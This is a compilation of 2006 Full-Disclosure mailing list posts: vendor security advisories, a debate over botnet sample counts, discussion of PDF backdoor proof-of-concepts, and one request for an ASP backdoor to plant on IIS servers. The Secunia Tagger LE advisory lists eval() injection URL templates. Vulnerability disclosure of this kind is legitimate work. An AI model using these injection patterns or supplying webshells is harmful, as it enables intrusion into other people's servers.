  Size/MD5: 3185 994d3417c1d9ec7eab79ea993cb37304

http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15_2.6.15.11.orig.tar.gz
  Size/MD5: 97566445 8bb235f9119aed52797b057827756b8c

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-common_2.6.15.11-4_all.deb
  Size/MD5:17844 f05d3a7a38b1c45959d6d19972e9dd68

  amd64 architecture (Athlon64, Opteron, EM64T Xeon)


http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/avm-fritz-firmware-2.6.15-26_3.11+2.6.15.11-4_amd64.deb
  Size/MD5:   474964 3caecd039a65b40abbb7e0992dfacaef

http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/avm-fritz-kernel-source_3.11+2.6.15.11-4_amd64.deb
  Size/MD5:  2404974 cb8229fe0f818d8a595c29d5d1d365be

http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/fglrx-control_8.25.18+2.6.15.11-4_amd64.deb
  Size/MD5:76148 dbbac55447617a2c29a5456bfb3ac956

http://security.ubuntu.com/ubuntu/pool/multiverse/l/linux-restricted-modules-2.6.15/fglrx-kernel-source_8.25.18+2.6.15.11-4_amd64.deb
  Size/MD5:   510394 79c3e8fd94f52f8803bc40587f07e2ac

http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-26-amd64-generic_2.6.15.11-4_amd64.deb
  Size/MD5:  6861180 6c3497ef198fe4f983a8fb7d644345eb

http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-26-amd64-k8_2.6.15.11-4_amd64.deb
  Size/MD5:  6860656 014f045a30ed2ebffe4a95958bddf933

http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/linux-restricted-modules-2.6.15-26-amd64-xeon_2.6.15.11-4_amd64.deb
  Size/MD5:  6837510 a12bc36da1ba8df6f3b441c050c41f5c

http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricted-firmware-2.6.15-26-amd64-generic-di_2.6.15.11-4_amd64.udeb
  Size/MD5:   799514 38bdf455f45161a6bc1bca5012f7b0d4

http://security.ubuntu.com/ubuntu/pool/restricted/l/linux-restricted-modules-2.6.15/nic-restricte

[Full-disclosure] Good ASP backdoor?

[Lachniet, Mark]

Can anyone suggest a good backdoor for placing on a IIS server when you
can upload a file to document root?  For exapmle an all-in-one tool with
upload, download, command execution, etc.  There are several basic ones
out there - I was wondering if anyone ever wrote a really spiffy one.

Thanks in advance,

Mark Lachniet

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Backdooring PDF Files

[Hugo Francisco González Robledo]

I think it depends on the context.

Example 1 (backdoored1.pdf) :

On Ubuntu Linux with Adobe Reader 7.0.1 opens the web page on
mozilla-firefox whitout warning.

On Windows XP sp2 with Adobe Reader 7.0.8 sends a warning about open the
url.

Example 2 (backdoored2.pdf) :

On Ubuntu Linux and windows XP sp2 does nothing apparently.

it, could be possible to make multi-target attacks :)

but other viewers like evince or xpdf don't have any effect :( 

Regards!

On Wed, Sep 13, 2006 at 11:06:55PM +0300, Juha-Matti Laurio wrote:
> Proof of Concept for example 1 (backdoored1.pdf) opened with Adobe Reader 
> 7.0.8
> (i.e. no browser plug-in used) issued a Security Warning dialog box:
> 
> "The document is trying to conenct to the site:
> http://www.google.com/owned.html
> 
> If you trust the site click "Allow", otherwise click "Block"."
> 
> Option Remember my action is in use as well.
> 
> When clicking "Allow" this Google page was opened in MSIE (in fact FF is my 
> default browser, however).
> 
> Am I missing something related to differences between Reader plug-in and 
> Reader application?
> 
> - Juha-Matti
> 
> 
> David Kierznowski <[EMAIL PROTECTED]> wrote: 
> >
> >Recently, there has been alot of hype involving backdooring various
> >web technologies. pdp (arcitect) has done alot of work centered around
> >this area.
> >
> >I saw Jeremiah Grossman mention PDF's being "BAD", however, I was
> >unable to easily locate any practical reasons as to why. I decided to
> >investigate this a little further.
> >
> >This article discusses two possible backdoor techniques for Adobe
> >Acrabat Reader and Professional. It includes proof of concept code and
> >backdoored PDF documents.
> >
> >The article can be found here:
> >http://michaeldaw.org/
> >
> >___
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
> ---
> This list is sponsored by: Norwich University
> 
> EARN A MASTER OF SCIENCE IN INFORMATION ASSURANCE - ONLINE
> The NSA has designated Norwich University a center of Academic Excellence 
> in Information Security. Our program offers unparalleled Infosec management 
> education and the case study affords you unmatched consulting experience. 
> Using interactive e-Learning technology, you can earn this esteemed degree, 
> without disrupting your career or home life.
> 
> http://www.msia.norwich.edu/secfocus
> ---

-- 
Hugo Francisco González Robledo
Instituto Tecnológico de San Luis Potosí

Llave pública en http://www.honeynet.org.mx
Llave pública en http://ardilla.zapto.org

Preguntale a Google-Earth donde estoy :
http://ardilla.zapto.org/ubicaHugo.kml

---
Educación es lo que queda después de olvidar
lo que se ha aprendido en la escuela.
Albert Einstein
---

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] the world of botnets article and wrong numbers

[Dave \"No, not that one\" Korn]

Gadi Evron wrote:

> Numbers...
> I can't speak for others, but I can try to answer better than I did
> on the botnets mailing list on whitestar.
>
> On individual honey nets, even rather large ones, the number of unique
> samples often assembled can be somewhere between 200 and 800
> a month.. depending on how wide it is spread and the networks it sits
> on. Which is why many of us cooperate.
>
>> From cumulative honey nets monitoring of such smaller (yet very
> effective) nets, and some larger nets, we get to a number of about
> 15K new bot samples every month (Alan Solomon and myself wrote 12K,
> so we underplayed it a bit due to statistics being a bit shaky). So
> the real avg number is somewhere around 15K new unique samples a
> month.

  Can you go into detail about the methodology you're using here?  How do 
you "get to a number" of 15,000 from a number "between 200 and 800"?  Is 
this a statistical extrapolation, or are you saying that your honeynet gets 
200 to 800 unique samples a month, and so does that one over there, and that 
one, and that one and they all add up to 15000?  Do you attempt to 
correct for variants that are simply re-packed using a different compressor, 
or other trivial changes?  Do you attempt to correct for complex polymorphic 
variants?

> Further, the anti virus world sees about the same numbers.
>
> The Microsoft anti malware team (and Ziv Mador specifically) spoke of
> 15K avg bot samples a month, as well.

  Got a link/quote/reference to that?  Does Ziv explain the methodology that 
they are using?

> I don't know what others may be seeing, but this is our best estimate
> as to what's going on with the number of unique samples released
> every month.
>
> Jose Nazarijo from Arbor replied on the botnets list that he sees
> similar numbers.
>
> I hope this helps... what are you looking to hear?

  Some kind of explanation for the huge disjunction between these numbers 
and our instinctive ideas about what's possible.  Of course, being 
un-worked-out intuitive estimates, such ideas are of course entirely likely 
to be off the mark, but off the mark by two orders of magnitude?  Hence the 
request for more methodological details.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200609-10 ] DokuWiki: Arbitrary command execution

[Sune Kloppenborg Jeppesen]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200609-10
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: DokuWiki: Arbitrary command execution
  Date: September 14, 2006
  Bugs: #146800
ID: 200609-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Vulnerabilities in some accessory scripts of DokuWiki allow remote code
execution.

Background
==

DokuWiki is a wiki targeted at developer teams, workgroups and small
companies. It does not use a database backend.

Affected packages
=

---
 Package/   Vulnerable   /  Unaffected
---
  1  www-apps/dokuwiki  < 20060309d   >= 20060309d

Description
===

"rgod" discovered that DokuWiki doesn't sanitize the X-FORWARDED-FOR
HTTP header, allowing the injection of arbitrary contents - such as PHP
commands - into a file. Additionally, the accessory scripts installed
in the "bin" DokuWiki directory are vulnerable to directory traversal
attacks, allowing to copy and execute the previously injected code.

Impact
==

A remote attacker may execute arbitrary PHP (and thus probably system)
commands with the permissions of the user running the process serving
DokuWiki pages.

Workaround
==

Disable remote access to the "bin" subdirectory of the DokuWiki
installation. Remove the directory if you don't use the scripts in
there.

Resolution
==

All DokuWiki users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=www-apps/dokuwiki-20060309d"

References
==

  [ 1 ] CVE-2006-4674
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4674
  [ 2 ] CVE-2006-4675
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4675
  [ 3 ] CVE-2006-4679
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4679

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200609-10.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2006 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


pgpX0ZWtgxl1j.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] the world of botnets article and wrong numbers

[Toby McKay]

On 9/14/06, 3APA3A <[EMAIL PROTECTED]> wrote:
Dear Toby McKay,Number of 12000 is absolutely impossible. Actual number is much higher.i agree its impossible! but on samples (actual bot samples)! ip addresses are a different ridiculous number gadi mentions. he said in the article there is 
3.5 MILLIONS unique ip addresses used every day in spam where does he come with these  ridiculous numbers?he says 'spam alone'... saying there is much more ip for botnets not in spam.
Let's  look on daily statistics for messages rejected as SPAM on my mailsystem.  Month  statistics requires to much information to be processed,sorry.On August, 13 150419 messages from 24244 unique IPs
On September, 12  160054 messages from 32882 unique  IPsOn September, 13  175573 messages from 35834 unique  IPsNew hosts between August, 13 and September, 13: 34952 (97%)New hosts between September, 12 and September, 13: 27988 (78%)
In  suggestion  average lifetime of spamming IP is higher than 1 day, wecan  approximate  number of spamming IPs on the whole net during one dayas  15 with 40% rotation within 1 week. That is 24 new IPs every
month.  The  problem  is,  most of these IPs are dynamic. So, we have todivide  this  number  on  average number of IPs infected host had duringinfection  period.  It's impossible to discover this number. My expert's
mark  is 3-5. That is, we have 5-8 new spamming bots every monthwith  average  life  of  2 weeks. Looks reasonable, but again it's takenfrom nowhere. And we only counted bots used for spamming :)
--Thursday, September 14, 2006, 3:05:42 PM, you wrote to full-disclosure@lists.grok.org.uk:TM> hi guysTM> i ask gadi on the botnets listserv on where he got the number 12K for bots
TM> every month on his the world of botnets article [TM> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf] .. he gave
TM> no real answer.TM> does that number sound right to anybody? where did you come up with it gadi?TM> ./mcktoby--~/ZARAZAYou know my name - look up my number (Beatles)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RSA SecurID SID800 Token vulnerable by design

[Brian Eaton]

Right.

Long-winded, but right.

Regards,
Brian

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] the world of botnets article and wrong numbers

[Toby McKay]

On 9/14/06, Gadi Evron <[EMAIL PROTECTED]> wrote:
> hi guys> i ask gadi on the botnets listserv on where he got the number 12K for> bots every month on his the world of botnets article [> 
http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdfYou did..> ] .. he gave no real answer.> does that number sound right to anybody? where did you come up with it> gadi?
First, the link I prefer people use is the one on my blog at securiteam,as it holds the copyright notice for Virus Bulletin, under which I wasallowed to host the article:
http://blogs.securiteam.com/index.php/archives/593Numbers...I can't speak for others, but I can try to answer better than I did on thebotnets mailing list on whitestar.On individual honey nets, even rather large ones, the number of unique
samples often assembled can be somewhere between 200 and 800a month.. depending on how wide it is spread and the networks it sitson. Which is why many of us cooperate.>From cumulative honey nets monitoring of such smaller (yet very
effective) nets, and some larger nets, we get to a number of about 15K newbot samples every month (Alan Solomon and myself wrote 12K, so weunderplayed it a bit due to statistics being a bit shaky). So the real avg
number is somewhere around 15K new unique samples a month.Further, the anti virus world sees about the same numbers.The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15Kavg bot samples a month, as well.
I don't know what others may be seeing, but this is our best estimate asto what's going on with the number of unique samples released every month.Jose Nazarijo from Arbor replied on the botnets list that he sees similar
numbers.I hope this helps... what are you looking to hear?Gadi.can you show samples for a month? can you show them as being real or in you rmind? 
>> ./mcktoby___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDKSA-2006:164 ] - Updated xorg-x11/XFree86 packages fix integer overflow vulnerabilities

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:164
 http://www.mandriva.com/security/
 ___
 
 Package : xorg-x11
 Date: September 14, 2006
 Affected: 2006.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Local exploitation of an integer overflow vulnerability in the
 'CIDAFM()' function in the X.Org and XFree86 X server could allow an
 attacker to execute arbitrary code with privileges of the X server,
 typically root (CVE-2006-3739).
 
 Local exploitation of an integer overflow vulnerability in the
 'scan_cidfont()' function in the X.Org and XFree86 X server could allow
 an attacker to execute arbitrary code with privileges of the X server,
 typically root (CVE-2006-3740).
 
 Updated packages are patched to address this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3739
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3740
 ___
 
 Updated Packages:
 
 Mandriva Linux 2006.0:
 870f66da912af0a4fad28efb9b88c90e  
2006.0/RPMS/libxorg-x11-6.9.0-5.10.20060mdk.i586.rpm
 0a8ff15caa27d78680f54486c67737e6  
2006.0/RPMS/libxorg-x11-devel-6.9.0-5.10.20060mdk.i586.rpm
 e66de8e6c72f5b47ea0b56e32d75e46e  
2006.0/RPMS/libxorg-x11-static-devel-6.9.0-5.10.20060mdk.i586.rpm
 4520ffe2166ef729c9b717571a0f858e  
2006.0/RPMS/X11R6-contrib-6.9.0-5.10.20060mdk.i586.rpm
 2288439bb004dfc1cbb9b1e1463a8e8a  
2006.0/RPMS/xorg-x11-100dpi-fonts-6.9.0-5.10.20060mdk.i586.rpm
 278c8e53603e73b09877d6939d29d281  
2006.0/RPMS/xorg-x11-6.9.0-5.10.20060mdk.i586.rpm
 6dd626b751c738c91f5a60fbabe1f3ca  
2006.0/RPMS/xorg-x11-75dpi-fonts-6.9.0-5.10.20060mdk.i586.rpm
 a166e90cc89070fb053aec43c96bd9de  
2006.0/RPMS/xorg-x11-cyrillic-fonts-6.9.0-5.10.20060mdk.i586.rpm
 46941ea873fd4a47b43e32517671ba8d  
2006.0/RPMS/xorg-x11-doc-6.9.0-5.10.20060mdk.i586.rpm
 45f99f735dcac5987c0bcf0bcdf86456  
2006.0/RPMS/xorg-x11-glide-module-6.9.0-5.10.20060mdk.i586.rpm
 dd6d86b93bdd5742674cfb3c49260542  
2006.0/RPMS/xorg-x11-server-6.9.0-5.10.20060mdk.i586.rpm
 f97eb010ee04a03365607e952d0cb3be  
2006.0/RPMS/xorg-x11-xauth-6.9.0-5.10.20060mdk.i586.rpm
 103b774cb9a79c0adaf4c5949b9269ca  
2006.0/RPMS/xorg-x11-Xdmx-6.9.0-5.10.20060mdk.i586.rpm
 ee5ba6d107047df4552cc06e0e0d9932  
2006.0/RPMS/xorg-x11-xfs-6.9.0-5.10.20060mdk.i586.rpm
 4734479179fc2b8df8a9383123cbe43d  
2006.0/RPMS/xorg-x11-Xnest-6.9.0-5.10.20060mdk.i586.rpm
 5aa7daf002ee73a61d719c318cc7fb0f  
2006.0/RPMS/xorg-x11-Xprt-6.9.0-5.10.20060mdk.i586.rpm
 399f003f1545c4a6f003f26f197264f6  
2006.0/RPMS/xorg-x11-Xvfb-6.9.0-5.10.20060mdk.i586.rpm
 d76d29e580eaea46f06e9031c4678a16  
2006.0/SRPMS/xorg-x11-6.9.0-5.10.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 44500ad48fab3741a6cd201e3e0c8e44  
x86_64/2006.0/RPMS/lib64xorg-x11-6.9.0-5.10.20060mdk.x86_64.rpm
 873c4f00872045e369d68b6c6bf0e9f4  
x86_64/2006.0/RPMS/lib64xorg-x11-devel-6.9.0-5.10.20060mdk.x86_64.rpm
 cf34abe58bce0f1cb39d279c1825f28d  
x86_64/2006.0/RPMS/lib64xorg-x11-static-devel-6.9.0-5.10.20060mdk.x86_64.rpm
 870f66da912af0a4fad28efb9b88c90e  
x86_64/2006.0/RPMS/libxorg-x11-6.9.0-5.10.20060mdk.i586.rpm
 0a8ff15caa27d78680f54486c67737e6  
x86_64/2006.0/RPMS/libxorg-x11-devel-6.9.0-5.10.20060mdk.i586.rpm
 e66de8e6c72f5b47ea0b56e32d75e46e  
x86_64/2006.0/RPMS/libxorg-x11-static-devel-6.9.0-5.10.20060mdk.i586.rpm
 ea646502e846d806b676425d73489bc6  
x86_64/2006.0/RPMS/X11R6-contrib-6.9.0-5.10.20060mdk.x86_64.rpm
 bb96282af5687aec3e671c5c6b715162  
x86_64/2006.0/RPMS/xorg-x11-100dpi-fonts-6.9.0-5.10.20060mdk.x86_64.rpm
 9554339037de4d0ca8decaf3030b94c1  
x86_64/2006.0/RPMS/xorg-x11-6.9.0-5.10.20060mdk.x86_64.rpm
 e03bf5aaffd4ff3d918226069404c88c  
x86_64/2006.0/RPMS/xorg-x11-75dpi-fonts-6.9.0-5.10.20060mdk.x86_64.rpm
 9cb232babce28cf0a9c9dbc3542c632a  
x86_64/2006.0/RPMS/xorg-x11-cyrillic-fonts-6.9.0-5.10.20060mdk.x86_64.rpm
 56ec5996265c951aee954105c3227809  
x86_64/2006.0/RPMS/xorg-x11-doc-6.9.0-5.10.20060mdk.x86_64.rpm
 900e0f2251e6c81afcc37a2c585720d7  
x86_64/2006.0/RPMS/xorg-x11-glide-module-6.9.0-5.10.20060mdk.x86_64.rpm
 e0f617bd52b0d50aa78a8b70316922cf  
x86_64/2006.0/RPMS/xorg-x11-server-6.9.0-5.10.20060mdk.x86_64.rpm
 e6610f07a1424051b95059afe5beb385  
x86_64/2006.0/RPMS/xorg-x11-xauth-6.9.0-5.10.20060mdk.x86_64.rpm
 05bfc5d4703ca7f181cf7b57c4569e4a  
x86_64/2006.0/RPMS/xorg-x11-Xdmx-6.9.0-5.10.20060mdk.x86_64.rpm
 169612fa75a90697f98372aa87185cb7  
x86_64/2006.0/RPMS/xorg-x11-xfs-6.9.0-5.10.20060mdk.x86_64.rpm
 51cda78610735e801d8b5d53043b831f  
x86_64/2006.0/RPMS/xorg-x11-Xnest-6.9.0-5.10.20060mdk.x86_64.rpm
 1b8416070f1ef2d307e5d00a3af8773b  
x86_64/2006.0/RPMS/xorg-x11-Xprt-6.9.0-5.10.2

Re: [Full-disclosure] the world of botnets article and wrong numbers

[3APA3A]

Dear Toby McKay,

Number of 12000 is absolutely impossible. Actual number is much higher.

Let's  look on daily statistics for messages rejected as SPAM on my mail
system.  Month  statistics requires to much information to be processed,
sorry.

On August, 13 150419 messages from 24244 unique IPs
On September, 12  160054 messages from 32882 unique  IPs
On September, 13  175573 messages from 35834 unique  IPs

New hosts between August, 13 and September, 13: 34952 (97%)
New hosts between September, 12 and September, 13: 27988 (78%)

In  suggestion  average lifetime of spamming IP is higher than 1 day, we
can  approximate  number of spamming IPs on the whole net during one day
as  15 with 40% rotation within 1 week. That is 24 new IPs every
month.  The  problem  is,  most of these IPs are dynamic. So, we have to
divide  this  number  on  average number of IPs infected host had during
infection  period.  It's impossible to discover this number. My expert's
mark  is 3-5. That is, we have 5-8 new spamming bots every month
with  average  life  of  2 weeks. Looks reasonable, but again it's taken
from nowhere. And we only counted bots used for spamming :)

--Thursday, September 14, 2006, 3:05:42 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

TM> hi guys
TM> i ask gadi on the botnets listserv on where he got the number 12K for bots
TM> every month on his the world of botnets article [
TM> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf] .. he gave
TM> no real answer.
TM> does that number sound right to anybody? where did you come up with it gadi?

TM> ./mcktoby


-- 
~/ZARAZA
You know my name - look up my number (Beatles)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] the world of botnets article and wrong numbers

[Gadi Evron]

> hi guys
> i ask gadi on the botnets listserv on where he got the number 12K for
> bots every month on his the world of botnets article [
> http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf

You did..

> ] .. he gave no real answer.
> does that number sound right to anybody? where did you come up with it
> gadi?

First, the link I prefer people use is the one on my blog at securiteam,
as it holds the copyright notice for Virus Bulletin, under which I was
allowed to host the article:
http://blogs.securiteam.com/index.php/archives/593

Numbers...
I can't speak for others, but I can try to answer better than I did on the
botnets mailing list on whitestar.

On individual honey nets, even rather large ones, the number of unique
samples often assembled can be somewhere between 200 and 800
a month.. depending on how wide it is spread and the networks it sits
on. Which is why many of us cooperate.

>From cumulative honey nets monitoring of such smaller (yet very
effective) nets, and some larger nets, we get to a number of about 15K new
bot samples every month (Alan Solomon and myself wrote 12K, so we
underplayed it a bit due to statistics being a bit shaky). So the real avg
number is somewhere around 15K new unique samples a month.

Further, the anti virus world sees about the same numbers.

The Microsoft anti malware team (and Ziv Mador specifically) spoke of 15K
avg bot samples a month, as well.

I don't know what others may be seeing, but this is our best estimate as
to what's going on with the number of unique samples released every month.

Jose Nazarijo from Arbor replied on the botnets list that he sees similar
numbers.

I hope this helps... what are you looking to hear?

Gadi.

> 
> ./mcktoby

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Backdooring PDF Files

[Dude VanWinkle]

On 9/14/06, Geo. <[EMAIL PROTECTED]> wrote:
> > POC did nothing for my Foxit PDF reader. No www-page was opened and no
> > script was executed. Maybe you folks should just dump the clumsy and
> > insecure Acrobat Reader and move onto something better for reading .pdf
> > documents? ;)
>
> Good suggestion but foxit doesn't allow typing into pdf form fields.
>
> Geo. (I'd use it if it weren't for that shortcomming)


Have you tried GhostScript and GhostView?

http://www.cs.wisc.edu/~ghost/

-JP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] the world of botnets article and wrong numbers

[Toby McKay]

hi guysi ask gadi on the botnets listserv on where he got the number 12K for bots every month on his the world of botnets article [http://www.beyondsecurity.com/whitepapers/SolomonEvronSept06.pdf
] .. he gave no real answer.does that number sound right to anybody? where did you come up with it gadi?./mcktoby
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Google Search API Worms

[pdp (architect)]

http://www.gnucitizen.org/blog/google-search-api-worms

The service that concerns me the most is Google AJAX Search API, the
new JavaScript powered search widget. In this article I cover the
potential problems with Google AJAX Search API and how it can be used
by web worms to propagate.

-- 
pdp (architect)
http://www.gnucitizen.org

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Backdooring PDF Files

[Geo.]

> POC did nothing for my Foxit PDF reader. No www-page was opened and no 
> script was executed. Maybe you folks should just dump the clumsy and 
> insecure Acrobat Reader and move onto something better for reading .pdf 
> documents? ;)

Good suggestion but foxit doesn't allow typing into pdf form fields.

Geo. (I'd use it if it weren't for that shortcomming)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Secunia Research: Tagger LE PHP "eval()" Injection Vulnerabilities

[Secunia Research]

==

 Secunia Research 14/09/2006

- Tagger LE PHP "eval()" Injection Vulnerabilities -

==
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerabilities...4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

==
1) Affected Software

Tagger LE latest version (product has no version information).

Other versions may also be affected.

==
2) Severity

Rating: Highly critical
Impact: System Access
Where:  From Remote

==
3) Vendor's Description of Software

Tagger LE is a tagboard (mini message board) that will add visitor 
interactivity with your website and a form of communication to one 
and another. Tagger's many features include an Administration panel, 
IP Banning, Smart Auto Refresh, Smilies, Imposter prevention, and 
more. A perfect addition to a website lacking interactivity. This 
solution uses a Flat File Database (MySQL is not required).

Product link:
http://www.venturenine.com/

==
4) Description of Vulnerabilities

Secunia Research has discovered some vulnerabilities in Tagger LE, 
which can be exploited by malicious people to compromise a vulnerable 
system.

Input passed via the query string in tags.php, sign.php, and 
admin/index.php isn't properly sanitised before being used in an 
"eval()" call. This can be exploited to inject and execute arbitrary 
PHP code via a specially crafted parameter name or value.

Examples:
http://[host]/tags.php?foo=%22.[code].%22
http://[host]/sign.php?foo=%22.[code].%22
http://[host]/admin/index.php?foo=%22.[code].%22
http://[host]/taggerLE/tags.php?foo;[code];$foo=foo
http://[host]/taggerLE/sign.php?foo;[code];$foo=foo
http://[host]/admin/index.php?foo;[code];$foo=foo

==
5) Solution

Edit the source code to ensure that input is properly sanitised.

==
6) Time Table

30/08/2006 - Initial vendor notification.
13/09/2006 - Final reminder.
14/09/2006 - Public disclosure.

==
7) Credits

Discovered by Andreas Sandblad, Secunia Research.

==
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned 
CVE-2006-4437 for the vulnerabilities.

==
9) About Secunia

Secunia collects, validates, assesses, and writes advisories regarding
all the latest software vulnerabilities disclosed to the public. These
advisories are gathered in a publicly available database at the
Secunia website:

http://secunia.com/

Secunia offers services to our customers enabling them to receive all
relevant vulnerability information to their specific system
configuration.

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

==
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2006-62/advisory/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/